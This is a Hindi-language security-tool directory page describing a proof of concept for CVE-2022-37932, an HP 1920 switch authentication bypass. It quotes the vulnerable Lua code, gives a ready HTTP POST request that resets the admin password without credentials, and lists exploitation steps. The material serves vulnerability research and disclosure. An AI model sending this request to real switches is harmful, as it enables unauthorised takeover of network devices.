Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-37932 — CVE-2022-37932 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण और तकनीकी विश्लेषण, HP 1920 सीरीज़ स्मार्ट मैनेज्ड स्विचेस में एक प्रमाणीकरण बायपास कमजोरी जो बिना प्रमाणीकरण के एडमिन पासवर्ड बदलने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/tim-hoekstra/cve-2022-37932
IoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubtim-hoekstra/cve-2022-37932

CVE-2022-37932

CVE-2022-37932 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण और तकनीकी विश्लेषण, HP 1920 सीरीज़ स्मार्ट मैनेज्ड स्विचेस में एक प्रमाणीकरण बायपास कमजोरी जो बिना प्रमाणीकरण के एडमिन पासवर्ड बदलने की अनुमति देती है।

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

HP स्विच फर्मवेयर प्रमाणीकरण बाईपास भेद्यता

CVE-2022-37932

फर्मवेयर संस्करण: PD.02.21
प्रभावित उपकरण: HP 1920 सीरीज़ स्मार्ट मैनेज्ड स्विच

अवलोकन

यह रिपॉजिटरी HP 1920 सीरीज़ स्मार्ट मैनेज्ड स्विच में फर्मवेयर संस्करण PD.02.21 चलाने वाले उपकरणों में एक गंभीर प्रमाणीकरण बाईपास भेद्यता का दस्तावेजीकरण करती है। यह भेद्यता एक अप्रमाणित हमलावर को बिना किसी पूर्व प्रमाणीकरण के एडमिन पासवर्ड बदलने की अनुमति देती है, जिससे उपकरण का पूर्ण अधिग्रहण संभव हो जाता है।

तकनीकी विवरण

यह भेद्यता /login/default_password_cfg.lua स्क्रिप्ट में मौजूद है, जो उपकरण के डिफ़ॉल्ट पासवर्ड को बदलने का कार्य संभालती है। यह स्क्रिप्ट:

  1. यह जाँच किए बिना फॉर्म POST अनुरोध स्वीकार करती है कि उपयोगकर्ता प्रमाणित है या नहीं
  2. केवल यह सत्यापित करती है कि oldPwd पैरामीटर डिफ़ॉल्ट पासवर्ड से मेल खाता है (जो खाली/रिक्त है)
  3. POST पैरामीटर के आधार पर सीधे उपयोगकर्ता का पासवर्ड बदल देती है

भेद्य कोड

default_password_cfg.lua में मुख्य भेद्य अनुभाग:

root@kitploit:~
if (request_method == 'POST') then
  -- कोई प्रमाणीकरण या सत्र जाँच नहीं!
  
  local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
  -- ...

  if form_post.oldPwd ~= defaultPassword then
    errorStatus = "401 Unauthorized"
    errorText = label.old_password_mismatch
  else
    -- पासवर्ड बदलने के लिए आगे बढ़ता है
    -- ...
  end
end

स्क्रिप्ट में महत्वपूर्ण सुरक्षा नियंत्रणों का अभाव है:

  • कोई सत्र सत्यापन नहीं
  • कोई CSRF सुरक्षा नहीं
  • कोई दर सीमा नहीं
  • प्रमाणीकरण के बिना पासवर्ड बदलने की कार्यक्षमता तक सीधी पहुँच

प्रूफ ऑफ कॉन्सेप्ट

एक हमलावर इस भेद्यता का शोषण एक सरल HTTP POST अनुरोध का उपयोग करके कर सकता है:

root@kitploit:~
POST /login/default_password_cfg.lua HTTP/1.1
Host: [target-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]

username=admin&oldPwd=&newPwd=[new-password]&confirmPwd=[new-password]

नोट: oldPwd पैरामीटर खाली छोड़ा गया है क्योंकि डिफ़ॉल्ट पासवर्ड रिक्त है।

प्रभाव

यह भेद्यता एक अप्रमाणित हमलावर को अनुमति देती है:

  1. बिना कोई क्रेडेंशियल जाने एडमिन पासवर्ड बदलना
  2. उपकरण पर पूर्ण प्रशासनिक नियंत्रण प्राप्त करना
  3. स्विच को कॉन्फ़िगर करना, नेटवर्क सेटिंग्स बदलना और संभावित रूप से पूरे नेटवर्क से समझौता करना

शोषण पथ

  1. नेटवर्क पर एक भेद्य HP 1920 सीरीज़ स्विच का पता लगाएँ
  2. उपकरण को सीधे तैयार किया गया HTTP POST अनुरोध भेजें
  3. एडमिन पासवर्ड हमलावर-नियंत्रित मान में बदल जाता है
  4. हमलावर अब नए पासवर्ड और पूर्ण एडमिन विशेषाधिकारों के साथ लॉगिन कर सकता है

क्रेडिट

मेरे पास यह शोध करने का समय नहीं था कि इस भेद्यता की मूल खोज किसने की, मैं केवल एक प्रूफ ऑफ कॉन्सेप्ट पोस्ट कर रहा हूँ।

कानूनी अस्वीकरण

यह जानकारी केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है। लेखक इस जानकारी के किसी भी दुरुपयोग के लिए उत्तरदायी नहीं है। भेद्यताओं का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें